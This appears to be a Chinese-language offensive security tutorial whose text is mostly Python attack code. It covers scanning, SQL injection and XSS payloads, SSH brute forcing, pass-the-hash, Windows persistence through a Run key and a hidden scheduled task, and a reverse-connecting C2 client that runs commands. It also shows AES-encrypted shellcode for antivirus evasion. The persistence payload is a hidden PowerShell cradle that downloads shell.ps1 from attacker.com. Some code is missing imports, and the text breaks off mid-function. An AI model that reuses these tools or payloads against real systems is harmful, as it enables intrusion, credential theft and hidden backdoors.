全栈网络安全实战:从渗透测试到高级红蓝对抗
本文将全面介绍现代网络安全攻防技术体系,涵盖渗透测试全流程、红蓝对抗实战技巧以及防御体系构建,通过大量可落地的代码示例帮助读者建立完整的网络安全攻防知识框架。
一、渗透测试基础与信息收集
1. 网络侦察与信息收集
import socket
import dns.resolver
import requests
from bs4 import BeautifulSoup
class Reconnaissance:
def __init__(self, target):
self.target = target
def dns_lookup(self):
"""DNS信息收集"""
records = ['A', 'MX', 'NS', 'TXT', 'CNAME']
results = {}
for record in records:
try:
answers = dns.resolver.resolve(self.target, record)
results[record] = [str(r) for r in answers]
except Exception as e:
pass
return results
def port_scan(self, ports=[21, 22, 80, 443, 3306, 3389]):
"""基础端口扫描"""
open_ports = []
for port in ports:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
result = sock.connect_ex((self.target, port))
if result == 0:
open_ports.append(port)
sock.close()
return open_ports
def web_crawl(self):
"""网站基础信息收集"""
headers = {'User-Agent': 'Mozilla/5.0'}
try:
response = requests.get(f"http://{self.target}", headers=headers, timeout=5)
soup = BeautifulSoup(response.text, 'html.parser')
info = {
'server': response.headers.get('Server', ''),
'technologies': self._detect_tech(response),
'links': [a.get('href') for a in soup.find_all('a', href=True)],
'forms': len(soup.find_all('form'))
}
return info
except Exception as e:
return str(e)
def _detect_tech(self, response):
"""检测网站技术栈"""
tech = []
headers = response.headers
if 'X-Powered-By' in headers:
tech.append(headers['X-Powered-By'])
if 'ASP.NET' in headers.get('Set-Cookie', ''):
tech.append('ASP.NET')
return tech
# 使用示例
recon = Reconnaissance('example.com')
print(f"DNS记录: {recon.dns_lookup()}")
print(f"开放端口: {recon.port_scan()}")
print(f"网站信息: {recon.web_crawl()}")
2. 自动化扫描工具开发
import nmap
import json
class VulnerabilityScanner:
def __init__(self):
self.nm = nmap.PortScanner()
def full_scan(self, target):
"""完整漏洞扫描"""
print(f"开始扫描 {target}...")
self.nm.scan(hosts=target, arguments='-sV -T4 -A -O')
results = {
'host': target,
'status': self.nm[target].state(),
'protocols': {}
}
for proto in self.nm[target].all_protocols():
results['protocols'][proto] = {}
for port in self.nm[target][proto].keys():
results['protocols'][proto][port] = {
'state': self.nm[target][proto][port]['state'],
'service': self.nm[target][proto][port]['name'],
'version': self.nm[target][proto][port]['version'],
'cpe': self.nm[target][proto][port]['cpe']
}
return results
# 使用示例
scanner = VulnerabilityScanner()
results = scanner.full_scan('192.168.1.1')
print(json.dumps(results, indent=2))
二、Web应用渗透测试
1. SQL注入检测与利用
import requests
from urllib.parse import urljoin
class SQLiTester:
def __init__(self, base_url):
self.base_url = base_url
self.session = requests.Session()
self.session.headers.update({'User-Agent': 'Mozilla/5.0'})
def test_get_param(self, param, values):
"""测试GET参数SQL注入"""
vulnerable = False
payloads = [
"'",
"\"",
"' OR '1'='1",
"\" OR \"1\"=\"1",
"' OR 1=1--",
"1 AND 1=1",
"1 AND 1=2"
]
for payload in payloads:
url = f"{self.base_url}?{param}={payload}"
response = self.session.get(url)
# 检测错误信息
error_keywords = ['SQL syntax', 'MySQL server', 'ORA-00933']
if any(keyword in response.text for keyword in error_keywords):
print(f"[!] 发现SQL注入漏洞: {url}")
vulnerable = True
break
return vulnerable
def blind_sqli(self, param, true_condition, false_condition):
"""基于布尔盲注的检测"""
payloads = {
'true': f"{param}=1 AND 1=1",
'false': f"{param}=1 AND 1=2"
}
true_response = self.session.get(urljoin(self.base_url, f"?{payloads['true']}"))
false_response = self.session.get(urljoin(self.base_url, f"?{payloads['false']}"))
if true_condition(true_response) and not false_condition(false_response):
print(f"[!] 发现基于布尔的盲注漏洞: {param}")
return True
return False
# 使用示例
tester = SQLiTester('http://testphp.vulnweb.com/listproducts.php')
tester.test_get_param('cat', [])
2. XSS漏洞检测
class XSSTester:
def __init__(self, base_url):
self.base_url = base_url
self.payloads = [
'<script>alert(1)</script>',
'<img src=x onerror=alert(1)>',
'\'"><svg/onload=alert(1)>',
'javascript:alert(1)'
]
def test_reflected(self, param):
"""测试反射型XSS"""
for payload in self.payloads:
url = f"{self.base_url}?{param}={payload}"
response = requests.get(url)
if payload in response.text:
print(f"[!] 发现反射型XSS: {url}")
return True
return False
def test_stored(self, form_data):
"""测试存储型XSS"""
for payload in self.payloads:
data = {}
for k, v in form_data.items():
data[k] = v.replace('XSS_PAYLOAD', payload)
# 提交表单
response = requests.post(self.base_url, data=data)
# 检查返回页面
check_response = requests.get(self.base_url)
if payload in check_response.text:
print(f"[!] 发现存储型XSS: {payload}")
return True
return False
# 使用示例
xss_tester = XSSTester('http://testphp.vulnweb.com/search.php')
xss_tester.test_reflected('searchFor')
三、内网渗透技术
1. 横向移动技术实现
import paramiko
import smbclient
from getpass import getpass
class LateralMovement:
def __init__(self):
self.ssh = paramiko.SSHClient()
self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
def ssh_bruteforce(self, host, username, wordlist):
"""SSH暴力破解"""
with open(wordlist, 'r') as f:
passwords = f.read().splitlines()
for password in passwords:
try:
self.ssh.connect(host, username=username, password=password, timeout=5)
print(f"[+] 成功破解: {username}:{password}")
return password
except:
continue
return None
def smb_exec(self, host, username, password, command):
"""通过SMB执行命令"""
try:
smbclient.ClientConfig(username=username, password=password)
with smbclient.open_file(fr"\\{host}\C$\Windows\Temp\output.txt", mode='w') as f:
f.write(os.popen(command).read())
return True
except Exception as e:
print(f"[-] SMB执行失败: {e}")
return False
def pass_the_hash(self, host, username, ntlm_hash):
"""Pass-the-Hash攻击"""
from impacket.smbconnection import SMBConnection
try:
conn = SMBConnection(host, host)
conn.login(username, '', '', ntlm_hash)
print(f"[+] 成功使用PtH登录: {username}")
return conn
except Exception as e:
print(f"[-] PtH失败: {e}")
return None
# 使用示例
lm = LateralMovement()
# lm.ssh_bruteforce('192.168.1.10', 'admin', 'passwords.txt')
# lm.smb_exec('192.168.1.10', 'admin', 'password123', 'whoami')
2. 权限维持技术
import os
import winreg
import base64
class Persistence:
def __init__(self):
self.payload = "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')\""
def registry_persistence(self):
"""注册表持久化"""
try:
key = winreg.OpenKey(
winreg.HKEY_CURRENT_USER,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
0, winreg.KEY_WRITE
)
winreg.SetValueEx(key, "UpdateChecker", 0, winreg.REG_SZ, self.payload)
winreg.CloseKey(key)
print("[+] 注册表持久化成功")
return True
except Exception as e:
print(f"[-] 注册表持久化失败: {e}")
return False
def scheduled_task(self, task_name="WindowsUpdate"):
"""计划任务持久化"""
try:
xml = f"""
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<Triggers>
<LogonTrigger>
<Enabled>true</Enabled>
</LogonTrigger>
</Triggers>
<Principals>
<Principal id="Author">
<UserId>S-1-5-18</UserId>
<RunLevel>HighestAvailable</RunLevel>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
<AllowHardTerminate>false</AllowHardTerminate>
<StartWhenAvailable>true</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>false</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>true</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
<Priority>7</Priority>
</Settings>
<Actions Context="Author">
<Exec>
<Command>cmd.exe</Command>
<Arguments>/c {self.payload}</Arguments>
</Exec>
</Actions>
</Task>
"""
with open("task.xml", "w") as f:
f.write(xml)
os.system(f'schtasks /Create /TN "{task_name}" /XML task.xml /F')
print("[+] 计划任务持久化成功")
return True
except Exception as e:
print(f"[-] 计划任务持久化失败: {e}")
return False
# 使用示例
# p = Persistence()
# p.registry_persistence()
# p.scheduled_task()
四、红蓝对抗实战
1. C2框架开发基础
import socket
import threading
import json
import base64
import os
class C2Server:
def __init__(self, host='0.0.0.0', port=4444):
self.host = host
self.port = port
self.sessions = {}
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
def start(self):
"""启动C2服务器"""
self.server_socket.bind((self.host, self.port))
self.server_socket.listen(5)
print(f"[*] C2服务器监听 {self.host}:{self.port}")
while True:
client_socket, addr = self.server_socket.accept()
print(f"[+] 新会话来自 {addr[0]}:{addr[1]}")
session_id = len(self.sessions) + 1
self.sessions[session_id] = {
'socket': client_socket,
'address': addr
}
client_thread = threading.Thread(
target=self.handle_client,
args=(client_socket, session_id)
)
client_thread.start()
def handle_client(self, client_socket, session_id):
"""处理客户端会话"""
while True:
try:
raw_data = client_socket.recv(1024)
if not raw_data:
break
data = json.loads(raw_data.decode())
if data['type'] == 'checkin':
print(f"[*] 会话 {session_id} 已上线")
self.send_command(session_id, 'whoami')
elif data['type'] == 'response':
print(f"\n[+] 会话 {session_id} 响应:")
print(data['data'])
# 交互式命令输入
cmd = input(f"C2 ({session_id})> ").strip()
if cmd.lower() == 'exit':
client_socket.close()
del self.sessions[session_id]
break
self.send_command(session_id, cmd)
except Exception as e:
print(f"[-] 会话 {session_id} 错误: {e}")
break
def send_command(self, session_id, command):
"""发送命令到客户端"""
if session_id in self.sessions:
data = {
'type': 'command',
'data': command
}
self.sessions[session_id]['socket'].send(json.dumps(data).encode())
# 客户端实现
class C2Client:
def __init__(self, server_host, server_port):
self.server_host = server_host
self.server_port = server_port
def connect(self):
"""连接到C2服务器"""
while True:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.server_host, self.server_port))
# 初始登记
data = {
'type': 'checkin',
'data': {
'hostname': os.getenv('COMPUTERNAME'),
'username': os.getenv('USERNAME')
}
}
sock.send(json.dumps(data).encode())
while True:
raw_data = sock.recv(1024)
if not raw_data:
break
command = json.loads(raw_data.decode())
if command['type'] == 'command':
# 执行命令并返回结果
result = os.popen(command['data']).read()
response = {
'type': 'response',
'data': result
}
sock.send(json.dumps(response).encode())
except Exception as e:
print(f"连接错误: {e}")
time.sleep(60) # 重连间隔
# 使用示例
# 服务端: server = C2Server(); server.start()
# 客户端: client = C2Client('attacker-ip', 4444); client.connect()
2. 免杀技术实现
import ctypes
import base64
import hashlib
from Crypto.Cipher import AES
import random
import string
class AVBypass:
def __init__(self):
self.key = hashlib.sha256(b'secret_key').digest()
def encrypt_shellcode(self, shellcode):
"""加密shellcode"""
iv = os.urandom(16)
cipher = AES.new(self.key, AES.MODE_CBC, iv)
padded = self._pad(shellcode)
encrypted = cipher.encrypt(padded)
return iv + encrypted
def _pad(self, s):
"""PKCS7填充"""
pad_size = AES.block_size - len(s) % AES.block_size
return s + bytes([pad_size] * pad_size)
def obfuscate_varnames(self, code):
"""变量名混淆"""
vars = set(re.findall(r'\b[a-zA-Z_][a-zA-Z0-9_]*\b', code))
vars = [v for v in vars if not v in ['print', 'import', 'for']]
for v in vars:
new_name = ''.join(random.choices(string.ascii_letters, k=10))
code = code.replace(v, new_name)
return code
def reflective_dll_injection(self, dll
